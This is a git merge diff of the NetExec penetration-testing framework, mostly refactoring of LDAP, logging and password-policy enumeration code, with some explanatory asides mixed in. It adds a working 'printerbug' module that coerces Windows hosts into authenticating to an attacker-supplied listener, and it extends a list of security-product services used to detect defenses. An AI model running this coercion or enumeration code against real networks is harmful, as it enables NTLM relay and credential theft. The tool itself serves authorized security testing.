Merge branch 'main' into neff-ldap-domain

Alex 2024-03-24 16:23:13 +01:00 committed by GitHub
commit 09a50d8043
23 changed files with 476 additions and 252 deletions


@@ -87,8 +87,8 @@ class connection:
         self.port = self.args.port
         self.conn = None
         self.admin_privs = False
-        self.password = None
-        self.username = None
+        self.password = ""
+        self.username = ""
         self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
         self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
         self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
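For illustration, a minimal sketch (hypothetical values, not part of the commit) of why the empty-string defaults matter: later guards such as self.username != "" and log formatting expect a string, which a None default would complicate.

    # Illustrative only: empty strings keep string checks and formatting safe.
    username = ""                      # was None before this change
    if not username:                   # still falsy, so "no credential" logic keeps working
        print("anonymous / null session")
    print(f"DOMAIN\\{username}")       # renders "DOMAIN\" instead of "DOMAIN\None"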


@@ -13,7 +13,7 @@ bh_enabled = False
 bh_uri = 127.0.0.1
 bh_port = 7687
 bh_user = neo4j
-bh_pass = neo4j
+bh_pass = bloodhoundcommunityedition

 [Empire]
 api_host = 127.0.0.1


@@ -52,14 +52,14 @@ def add_user_bh(user, domain, logger, config):
                 _add_with_domain(user_info, domain, tx, logger)
         except AuthError:
             logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
-            return
+            exit()
         except ServiceUnavailable:
             logger.fail(f"Neo4J does not seem to be available on {uri}.")
-            return
+            exit()
         except Exception as e:
             logger.fail(f"Unexpected error with Neo4J: {e}")
-            return
+        finally:
             driver.close()


 def _add_with_domain(user_info, domain, tx, logger):


@@ -16,13 +16,11 @@ class NXCAdapter(logging.LoggerAdapter):
         logging.basicConfig(
             format="%(message)s",
             datefmt="[%X]",
-            handlers=[
-                RichHandler(
-                    console=nxc_console,
-                    rich_tracebacks=True,
-                    tracebacks_show_locals=False,
-                )
-            ],
+            handlers=[RichHandler(
+                console=nxc_console,
+                rich_tracebacks=True,
+                tracebacks_show_locals=False
+            )],
         )
         self.logger = logging.getLogger("nxc")
         self.extra = extra
@@ -40,30 +38,21 @@ class NXCAdapter(logging.LoggerAdapter):
         if self.extra is None:
             return f"{msg}", kwargs

-        if "module_name" in self.extra and len(self.extra["module_name"]) > 8:
+        if "module_name" in self.extra and len(self.extra["module_name"]) > 11:
             self.extra["module_name"] = self.extra["module_name"][:8] + "..."

         # If the logger is being called when hooking the 'options' module function
         if len(self.extra) == 1 and ("module_name" in self.extra):
-            return (
-                f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
-                kwargs,
-            )
+            return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}", kwargs)

         # If the logger is being called from nxcServer
         if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra):
-            return (
-                f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
-                kwargs,
-            )
+            return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", kwargs)

         # If the logger is being called from a protocol
         module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"])
-        return (
-            f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
-            kwargs,
-        )
+        return (f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}", kwargs)

     def display(self, msg, *args, **kwargs):
         """Display text to console, formatted for nxc"""
@@ -104,17 +93,7 @@ class NXCAdapter(logging.LoggerAdapter):
         if len(self.logger.handlers):
             try:
                 for handler in self.logger.handlers:
-                    handler.handle(
-                        LogRecord(
-                            "nxc",
-                            20,
-                            "",
-                            kwargs,
-                            msg=text,
-                            args=args,
-                            exc_info=None,
-                        )
-                    )
+                    handler.handle(LogRecord("nxc", 20, "", kwargs, msg=text, args=args, exc_info=None))
             except Exception as e:
                 self.logger.fail(f"Issue while trying to custom print handler: {e}")
         else:
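A quick illustration of the truncation threshold change (module names below are only examples): with the old > 8 check a 9 to 11 character name was cut to 8 characters plus "...", i.e. rewritten into an 11 character string, so only names longer than 11 characters actually need shortening.

    def truncate(module_name, threshold):
        # mirrors the logic above: cut to 8 chars and append "..." when over the threshold
        if len(module_name) > threshold:
            module_name = module_name[:8] + "..."
        return module_name

    print(truncate("printerbug", 8))   # 'printerb...' -> 10 chars became 11 with the old check
    print(truncate("printerbug", 11))  # 'printerbug'  -> left alone with the new check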


@@ -35,7 +35,7 @@ class NXCModule:
         results = self._detect_installed_services(context, connection, target)
         self.detect_running_processes(context, connection, results)

-        self.dump_results(results, connection.hostname, context)
+        self.dump_results(results, context)

     def _get_target(self, connection):
         return connection.host if not connection.kerberos else f"{connection.hostname}.{connection.domain}"
@@ -58,18 +58,16 @@
             dce, _ = lsa.connect()
             policyHandle = lsa.open_policy(dce)

-            try:
-                for product in conf["products"]:
-                    for service in product["services"]:
+            for product in conf["products"]:
+                for service in product["services"]:
+                    try:
                         lsa.LsarLookupNames(dce, policyHandle, service["name"])
                         context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
                         results.setdefault(product["name"], {"services": []})["services"].append(service)
-            except Exception:
-                pass
+                    except Exception:
+                        pass
         except Exception as e:
             context.log.fail(str(e))
         return results

     def detect_running_processes(self, context, connection, results):
@@ -80,13 +78,16 @@ class NXCModule:
                 for product in conf["products"]:
                     for pipe in product["pipes"]:
                         if pathlib.PurePath(fl).match(pipe["name"]):
-                            context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
+                            context.log.info(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
                             prod_results = results.setdefault(product["name"], {})
                             prod_results.setdefault("pipes", []).append(pipe)
         except Exception as e:
-            context.log.debug(str(e))
+            if "STATUS_ACCESS_DENIED" in str(e):
+                context.log.fail("Error STATUS_ACCESS_DENIED while enumerating pipes, probably due to using SMBv1")
+            else:
+                context.log.fail(str(e))

-    def dump_results(self, results, remoteName, context):
+    def dump_results(self, results, context):
         if not results:
             context.log.highlight("Found NOTHING!")
             return
@@ -261,7 +262,10 @@ conf = {
             {"name": "epfw", "description": "ESET"},
             {"name": "epfwlwf", "description": "ESET"},
             {"name": "epfwwfp", "description": "ESET"},
-            {"name": "EraAgentSvc", "description": "ESET"},
+            {"name": "EraAgentSvc", "description": "ESET Management Agent service"},
+            {"name": "ERAAgent", "description": "ESET Management Agent service"},
+            {"name": "efwd", "description": "ESET Communication Forwarding Service"},
+            {"name": "ehttpsrv", "description": "ESET HTTP Server"},
         ],
         "pipes": [{"name": "nod_scriptmon_pipe", "processes": [""]}],
     },


@@ -146,7 +146,7 @@ class NXCModule:
     @staticmethod
     def save_credentials(context, connection, domain, username, password, lmhash, nthash):
-        host_id = context.db.get_computers(connection.host)[0][0]
+        host_id = context.db.get_hosts(connection.host)[0][0]
         if password is not None:
             credential_type = "plaintext"
         else:


@@ -39,10 +39,15 @@ class NXCModule:
         async def run_ldaps_noEPA(target, credential):
             ldapsClientConn = MSLDAPClientConnection(target, credential)
             _, err = await ldapsClientConn.connect()
+
+            # Required step to try to bind without channel binding
+            ldapsClientConn.cb_data = None
+
             if err is not None:
                 context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
                 sys.exit()
-            _, err = await ldapsClientConn.bind()
+
+            valid, err = await ldapsClientConn.bind()
             if "data 80090346" in str(err):
                 return True  # channel binding IS enforced
             elif "data 52e" in str(err):
@@ -114,19 +119,30 @@ class NXCModule:
         # requirements are enforced based on potential errors
         # during the bind attempt.
         async def run_ldap(target, credential):
-            ldapsClientConn = MSLDAPClientConnection(target, credential)
-            _, err = await ldapsClientConn.connect()
-            if err is None:
-                _, err = await ldapsClientConn.bind()
-                if "stronger" in str(err):
-                    return True  # because LDAP server signing requirements ARE enforced
-                elif ("data 52e") in str(err):
-                    context.log.fail("Not connected... exiting")
-                    sys.exit()
-                elif err is None:
-                    return False
-            else:
-                context.log.fail(str(err))
+            try:
+                ldapsClientConn = MSLDAPClientConnection(target, credential)
+                ldapsClientConn._disable_signing = True
+                _, err = await ldapsClientConn.connect()
+                if err is not None:
+                    context.log.fail(str(err))
+                    return False
+
+                _, err = await ldapsClientConn.bind()
+                if err is not None:
+                    errstr = str(err).lower()
+                    if "stronger" in errstr:
+                        return True
+                        # because LDAP server signing requirements ARE enforced
+                    else:
+                        context.log.fail(str(err))
+                else:
+                    # LDAPS bind successful
+                    return False
+                    # because LDAP server signing requirements are not enforced
+            except Exception as e:
+                context.log.debug(str(e))
+                return False

         # Run trough all our code blocks to determine LDAP signing and channel binding settings.
         stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
@@ -148,9 +164,8 @@ class NXCModule:
             stype=stype,
         )

-        target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
+        target = MSLDAPTarget(connection.host, 389, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
         ldapIsProtected = asyncio.run(run_ldap(target, credential))

         if ldapIsProtected is False:
             context.log.highlight("LDAP Signing NOT Enforced!")
         elif ldapIsProtected is True:
@@ -162,7 +177,7 @@ class NXCModule:
         if DoesLdapsCompleteHandshake(connection.host) is True:
             target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
             ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
-            target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
+            target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
             ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
             if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
                 context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
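As a condensed, paraphrased summary of how the probes above combine (this is not the module's code and the labels other than the "When Supported" string are reworded): "stronger" on a plain LDAP bind means signing is required, "data 80090346" on an LDAPS bind without channel-binding data means channel binding is enforced, and the with/without EPA pair separates "always" from "when supported".

    # Sketch only: paraphrased decision logic, assuming the three boolean results above.
    def summarize(signing_required, cb_always, cb_when_supported):
        findings = ["LDAP signing enforced" if signing_required else "LDAP Signing NOT Enforced!"]
        if cb_always:
            findings.append("LDAPS channel binding: always required")
        elif cb_when_supported:
            findings.append('LDAPS Channel Binding is set to "When Supported"')
        else:
            findings.append("LDAPS channel binding: not enforced")
        return findings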

nxc/modules/printerbug.py (new file, +117 lines)

@@ -0,0 +1,117 @@
from impacket.dcerpc.v5 import transport, rprn


class NXCModule:
    name = "printerbug"
    description = "Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion."
    supported_protocols = ["smb"]
    opsec_safe = True
    multiple_hosts = True

    def __init__(self, context=None, module_options=None):
        self.context = context
        self.module_options = module_options
        self.listener = None

    def options(self, context, module_options):
        """LISTENER    Listener Address (defaults to 127.0.0.1)"""
        self.listener = "127.0.0.1"
        if "LISTENER" in module_options:
            self.listener = module_options["LISTENER"]

    def on_login(self, context, connection):
        trigger = TriggerAuth(context)
        target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
        dce = trigger.connect(
            username=connection.username,
            password=connection.password,
            domain=connection.domain,
            lmhash=connection.lmhash,
            nthash=connection.nthash,
            target=target,
            doKerberos=connection.kerberos,
            dcHost=connection.kdcHost,
            aesKey=connection.aesKey,
        )

        if dce is not None:
            context.log.debug("Target is vulnerable to PrinterBug")
            trigger.RpcRemoteFindFirstPrinterChange(dce, self.listener, target)
            context.log.highlight("VULNERABLE")
            dce.disconnect()
        else:
            context.log.debug("Target is not vulnerable to PrinterBug")


################################################################################
# RPC CALLS
################################################################################
class TriggerAuth:
    def __init__(self, context):
        self.context = context

    def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):
        rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\spoolss]" % target)
        rpctransport.set_dport(445)

        if hasattr(rpctransport, "set_credentials"):
            rpctransport.set_credentials(
                username=username,
                password=password,
                domain=domain,
                lmhash=lmhash,
                nthash=nthash,
                aesKey=aesKey,
            )

        if doKerberos:
            rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)

        rpctransport.setRemoteHost(target)
        dce = rpctransport.get_dce_rpc()
        self.context.log.debug("Connecting to {}".format(r"ncacn_np:%s[\PIPE\spoolfs]") % target)
        try:
            dce.connect()
        except Exception as e:
            self.context.log.debug(f"Something went wrong, check error status => {e!s}")
            return None
        try:
            dce.bind(rprn.MSRPC_UUID_RPRN)
        except Exception as e:
            self.context.log.debug(f"Something went wrong, check error status => {e!s}")
            return None
        self.context.log.debug("Successfully bound!")
        return dce

    def RpcRemoteFindFirstPrinterChange(self, dce, listener, target):
        self.context.log.debug("Sending RpcRemoteFindFirstPrinterChange!")
        try:
            resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
        except Exception as e:
            if str(e).find("Broken pipe") >= 0:
                # The connection timed-out. Let's try to bring it back next round
                self.context.log.error("Connection failed - skipping host!")
                return
            elif str(e).upper().find("ACCESS_DENIED"):
                # We're not admin, bye
                self.context.log.error("Access denied - RPC call was denied")
                dce.disconnect()
                return
            else:
                raise
        self.context.log.debug("Got handle")

        try:
            request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
            request["hPrinter"] = resp["pHandle"]
            request["fdwFlags"] = rprn.PRINTER_CHANGE_ADD_JOB
            request["pszLocalMachine"] = "\\\\%s\x00" % listener
        except Exception as e:
            self.context.log.debug(e)
        try:
            dce.request(request)
        except Exception as e:
            self.context.log.debug(e)
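A hypothetical invocation of the new module, following NetExec's usual -M/-o option syntax (addresses and credentials are placeholders):

    netexec smb 192.168.1.10 -u user -p 'Passw0rd!' -M printerbug -o LISTENER=192.168.1.50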


@@ -1,92 +1,111 @@
-from impacket.ldap import ldapasn1 as ldapasn1_impacket
-from impacket.ldap import ldap as ldap_impacket
-from math import fabs
-
-
-class NXCModule:
-    """
-    Created by fplazar and wanetty
-    Module by @gm_eduard and @ferranplaza
-    Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py
-    """
-
-    name = "pso"
-    description = "Query to get PSO from LDAP"
-    supported_protocols = ["ldap"]
-    opsec_safe = True
-    multiple_hosts = True
-
-    pso_fields = [
-        "cn",
-        "msDS-PasswordReversibleEncryptionEnabled",
-        "msDS-PasswordSettingsPrecedence",
-        "msDS-MinimumPasswordLength",
-        "msDS-PasswordHistoryLength",
-        "msDS-PasswordComplexityEnabled",
-        "msDS-LockoutObservationWindow",
-        "msDS-LockoutDuration",
-        "msDS-LockoutThreshold",
-        "msDS-MinimumPasswordAge",
-        "msDS-MaximumPasswordAge",
-        "msDS-PSOAppliesTo",
-    ]
-
-    def options(self, context, module_options):
-        """No options available."""
-
-    def convert_time_field(self, field, value):
-        time_fields = {"msDS-LockoutObservationWindow": (60, "mins"), "msDS-MinimumPasswordAge": (86400, "days"), "msDS-MaximumPasswordAge": (86400, "days"), "msDS-LockoutDuration": (60, "mins")}
-        if field in time_fields:
-            value = f"{int(fabs(float(value)) / (10000000 * time_fields[field][0]))} {time_fields[field][1]}"
-        return value
-
-    def on_login(self, context, connection):
-        """Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
-        # Building the search filter
-        search_filter = "(objectClass=msDS-PasswordSettings)"
-
-        try:
-            context.log.debug(f"Search Filter={search_filter}")
-            resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=self.pso_fields, sizeLimit=0)
-        except ldap_impacket.LDAPSearchError as e:
-            if e.getErrorString().find("sizeLimitExceeded") >= 0:
-                context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
-                # We reached the sizeLimit, process the answers we have already and that's it. Until we implement
-                # paged queries
-                resp = e.getAnswers()
-            else:
-                context.log.debug(e)
-                return False
-
-        pso_list = []
-
-        context.log.debug(f"Total of records returned {len(resp)}")
-        for item in resp:
-            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
-                continue
-            pso_info = {}
-            try:
-                for attribute in item["attributes"]:
-                    attr_name = str(attribute["type"])
-                    if attr_name in self.pso_fields:
-                        pso_info[attr_name] = attribute["vals"][0]._value.decode("utf-8")
-                pso_list.append(pso_info)
-            except Exception as e:
-                context.log.debug("Exception:", exc_info=True)
-                context.log.debug(f"Skipping item, cannot process due to error {e}")
-
-        if len(pso_list) > 0:
-            context.log.success("Password Settings Objects (PSO) found:")
-            for pso in pso_list:
-                for field in self.pso_fields:
-                    if field in pso:
-                        value = self.convert_time_field(field, pso[field])
-                        context.log.highlight(f"{field}: {value}")
-                context.log.highlight("-----")
-        else:
-            context.log.info("No Password Settings Objects (PSO) found.")
+from dateutil.relativedelta import relativedelta as rd
+from impacket.ldap import ldapasn1 as ldapasn1_impacket
+
+
+class NXCModule:
+    """
+    Initial FGPP/PSO script written by @n00py: https://github.com/n00py/GetFGPP
+
+    Module by @_sandw1ch
+    """
+
+    name = "pso"
+    description = "Module to get the Fine Grained Password Policy/PSOs"
+    supported_protocols = ["ldap"]
+    opsec_safe = True
+    multiple_hosts = False
+
+    def __init__(self, context=None, module_options=None):
+        self.context = context
+        self.module_options = module_options
+
+    def options(self, context, module_options):
+        """No options available."""
+
+    def on_login(self, context, connection):
+        # Are there even any FGPPs?
+        context.log.success("Attempting to enumerate policies...")
+        resp = connection.ldapConnection.search(searchBase=f"CN=Password Settings Container,CN=System,{''.join([f'DC={dc},' for dc in connection.domain.split('.')]).rstrip(',')}", searchFilter="(objectclass=*)")
+        if len(resp) > 1:
+            context.log.highlight(f"{len(resp) - 1} PSO Objects found!")
+            context.log.highlight("")
+            context.log.success("Attempting to enumerate objects with an applied policy...")
+
+        # Who do they apply to?
+        resp = connection.search(searchFilter="(objectclass=*)", attributes=["DistinguishedName", "msDS-PSOApplied"])
+        for attrs in resp:
+            if isinstance(attrs, ldapasn1_impacket.SearchResultEntry) is not True:
+                continue
+            for attr in attrs["attributes"]:
+                if str(attr["type"]) in "msDS-PSOApplied":
+                    context.log.highlight(f"Object: {attrs['objectName']}")
+                    context.log.highlight("Applied Policy: ")
+                    for value in attr["vals"]:
+                        context.log.highlight(f"\t{value}")
+                    context.log.highlight("")
+
+        # Let"s find out even more details!
+        context.log.success("Attempting to enumerate details...\n")
+        resp = connection.search(searchFilter="(objectclass=msDS-PasswordSettings)",
+                                 attributes=["name", "msds-lockoutthreshold", "msds-psoappliesto", "msds-minimumpasswordlength",
+                                             "msds-passwordhistorylength", "msds-lockoutobservationwindow", "msds-lockoutduration",
+                                             "msds-passwordsettingsprecedence", "msds-passwordcomplexityenabled", "Description",
+                                             "msds-passwordreversibleencryptionenabled", "msds-minimumpasswordage", "msds-maximumpasswordage"])
+
+        for attrs in resp:
+            if not isinstance(attrs, ldapasn1_impacket.SearchResultEntry):
+                continue
+            policyName, description, passwordLength, passwordhistorylength, lockoutThreshold, obersationWindow, lockoutDuration, complexity, minPassAge, maxPassAge, reverseibleEncryption, precedence, policyApplies = ("",) * 13
+            for attr in attrs["attributes"]:
+                if str(attr["type"]) == "name":
+                    policyName = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-LockoutThreshold":
+                    lockoutThreshold = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-MinimumPasswordLength":
+                    passwordLength = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-PasswordHistoryLength":
+                    passwordhistorylength = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-LockoutObservationWindow":
+                    observationWindow = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-LockoutDuration":
+                    lockoutDuration = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-PasswordSettingsPrecedence":
+                    precedence = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-PasswordComplexityEnabled":
+                    complexity = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-PasswordReversibleEncryptionEnabled":
+                    reverseibleEncryption = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-MinimumPasswordAge":
+                    minPassAge = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-MaximumPasswordAge":
+                    maxPassAge = attr["vals"][0]
+                elif str(attr["type"]) == "description":
+                    description = attr["vals"][0]
+                elif str(attr["type"]) == "msDS-PSOAppliesTo":
+                    policyApplies = ""
+                    for value in attr["vals"]:
+                        policyApplies += f"{value};"
+            context.log.highlight(f"Policy Name: {policyName}")
+            if description:
+                context.log.highlight(f"Description: {description}")
+            context.log.highlight(f"Minimum Password Length: {passwordLength}")
+            context.log.highlight(f"Minimum Password History Length: {passwordhistorylength}")
+            context.log.highlight(f"Lockout Threshold: {lockoutThreshold}")
+            context.log.highlight(f"Observation Window: {mins(observationWindow)}")
+            context.log.highlight(f"Lockout Duration: {mins(lockoutDuration)}")
+            context.log.highlight(f"Complexity Enabled: {complexity}")
+            context.log.highlight(f"Minimum Password Age: {days(minPassAge)}")
+            context.log.highlight(f"Maximum Password Age: {days(maxPassAge)}")
+            context.log.highlight(f"Reversible Encryption: {reverseibleEncryption}")
+            context.log.highlight(f"Precedence: {precedence} (Lower is Higher Priority)")
+            context.log.highlight("Policy Applies to:")
+            for value in str(policyApplies)[:-1].split(";"):
+                if value:
+                    context.log.highlight(f"\t{value}")
+            context.log.highlight("")
+
+
+def days(ldap_time):
+    return f"{rd(seconds=int(abs(int(ldap_time)) / 10000000)).days} days"
+
+
+def mins(ldap_time):
+    return f"{rd(seconds=int(abs(int(ldap_time)) / 10000000)).minutes} minutes"


@@ -79,6 +79,7 @@ def main():
     else:
         nxc_logger.logger.setLevel(logging.ERROR)
         root_logger.setLevel(logging.ERROR)
+        logging.getLogger("neo4j").setLevel(logging.ERROR)

     # if these are the same, it might double log to file (two FileHandlers will be added)
     # but this should never happen by accident


@@ -0,0 +1,13 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket


def parse_result_attributes(ldap_response):
    parsed_response = []
    for entry in ldap_response:
        # SearchResultReferences may be returned
        if not isinstance(entry, ldapasn1_impacket.SearchResultEntry):
            continue
        attribute_map = {}
        for attribute in entry["attributes"]:
            attribute_map[str(attribute["type"])] = str(attribute["vals"][0])
        parsed_response.append(attribute_map)
    return parsed_response
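A usage sketch for the new helper (not standalone: it assumes an authenticated nxc LDAP connection object like the ones used in the ldap protocol code below):

    # Hypothetical call site: flatten an impacket search response into plain dicts.
    resp = connection.search(searchFilter="(sAMAccountType=805306368)", attributes=["sAMAccountName", "description"])
    for user in parse_result_attributes(resp):
        print(user.get("sAMAccountName", ""), user.get("description", ""))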


@@ -5,7 +5,7 @@ import hmac
 import os
 import socket
 from binascii import hexlify
-from datetime import datetime
+from datetime import datetime, timedelta
 from re import sub, I
 from zipfile import ZipFile
 from termcolor import colored
@@ -38,6 +38,7 @@ from nxc.logger import NXCAdapter, nxc_logger
 from nxc.protocols.ldap.bloodhound import BloodHound
 from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
 from nxc.protocols.ldap.kerberos import KerberosAttacks
+from nxc.parsers.ldap_results import parse_result_attributes

 ldap_error_status = {
     "1": "STATUS_NOT_SUPPORTED",
@@ -287,7 +288,7 @@ class ldap(connection):
         # Re-connect since we logged off
         self.create_conn_obj()
-        self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
+        self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}".replace(":", "-"))

     def print_host_info(self):
         self.logger.debug("Printing host info for LDAP")
@@ -370,12 +371,11 @@ class ldap(connection):
             used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
             out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
             self.logger.extra["protocol"] = "LDAP"
             self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -432,7 +432,7 @@ class ldap(connection):
             self.logger.extra["port"] = "636"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -488,7 +488,7 @@ class ldap(connection):
             self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -516,7 +516,7 @@ class ldap(connection):
             self.logger.extra["port"] = "636"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -582,7 +582,7 @@ class ldap(connection):
             self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -609,7 +609,7 @@ class ldap(connection):
             self.logger.extra["port"] = "636"
             self.logger.success(out)
-            if not self.args.local_auth:
+            if not self.args.local_auth and self.username != "":
                 add_user_bh(self.username, self.domain, self.logger, self.config)
             if self.admin_privs:
                 add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@@ -751,37 +751,51 @@ class ldap(connection):
         return False

     def users(self):
-        # Building the search filter
-        search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
-        attributes = [
-            "sAMAccountName",
-            "description",
-            "badPasswordTime",
-            "badPwdCount",
-            "pwdLastSet",
-        ]
-        resp = self.search(search_filter, attributes, sizeLimit=0)
-        if resp:
-            self.logger.display(f"Total of records returned {len(resp):d}")
-            for item in resp:
-                if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
-                    continue
-                sAMAccountName = ""
-                description = ""
-                try:
-                    if self.username == "":
-                        self.logger.highlight(f"{item['objectName']}")
-                    else:
-                        for attribute in item["attributes"]:
-                            if str(attribute["type"]) == "sAMAccountName":
-                                sAMAccountName = str(attribute["vals"][0])
-                            elif str(attribute["type"]) == "description":
-                                description = str(attribute["vals"][0])
-                        self.logger.highlight(f"{sAMAccountName:<30} {description}")
-                except Exception as e:
-                    self.logger.debug(f"Skipping item, cannot process due to error {e}")
-            return
+        """
+        Retrieves user information from the LDAP server.
+
+        Args:
+        ----
+            input_attributes (list): Optional. List of attributes to retrieve for each user.
+
+        Returns:
+        -------
+            None
+        """
+        if len(self.args.users) > 0:
+            self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
+            search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.users)})"
+        else:
+            self.logger.debug("Trying to dump all users")
+            search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
+
+        # default to these attributes to mirror the SMB --users functionality
+        request_attributes = ["sAMAccountName", "description", "badPwdCount", "pwdLastSet"]
+        resp = self.search(search_filter, request_attributes, sizeLimit=0)
+
+        if resp:
+            # I think this was here for anonymous ldap bindings, so I kept it, but we might just want to remove it
+            if self.username == "":
+                self.logger.display(f"Total records returned: {len(resp):d}")
+                for item in resp:
+                    if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
+                        continue
+                    self.logger.highlight(f"{item['objectName']}")
+                return
+
+            users = parse_result_attributes(resp)
+            # we print the total records after we parse the results since often SearchResultReferences are returned
+            self.logger.display(f"Total records returned: {len(users):d}")
+            self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
+            for user in users:
+                # TODO: functionize this - we do this calculation in a bunch of places, different, including in the `pso` module
+                timestamp_seconds = int(user.get("pwdLastSet", "")) / 10**7
+                start_date = datetime(1601, 1, 1)
+                parsed_pw_last_set = (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
+                if parsed_pw_last_set == "1601-01-01 00:00:00":
+                    parsed_pw_last_set = "<never>"
+                # we default attributes to blank strings if they don't exist in the dict
+                self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{user.get('badPwdCount', ''):<8}{user.get('description', ''):<60}")

     def groups(self):
         # Building the search filter
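Two small, self-contained illustrations of the pieces above: the OR filter built when specific users are requested, and the pwdLastSet FILETIME conversion (the zero value is the "never set" case handled above):

    from datetime import datetime, timedelta

    requested = ["alice", "bob"]                 # hypothetical --users arguments
    search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in requested)})"
    print(search_filter)                         # (|(sAMAccountName=alice)(sAMAccountName=bob))

    pwd_last_set = 0                             # AD stores 100 ns ticks since 1601-01-01; 0 means never set
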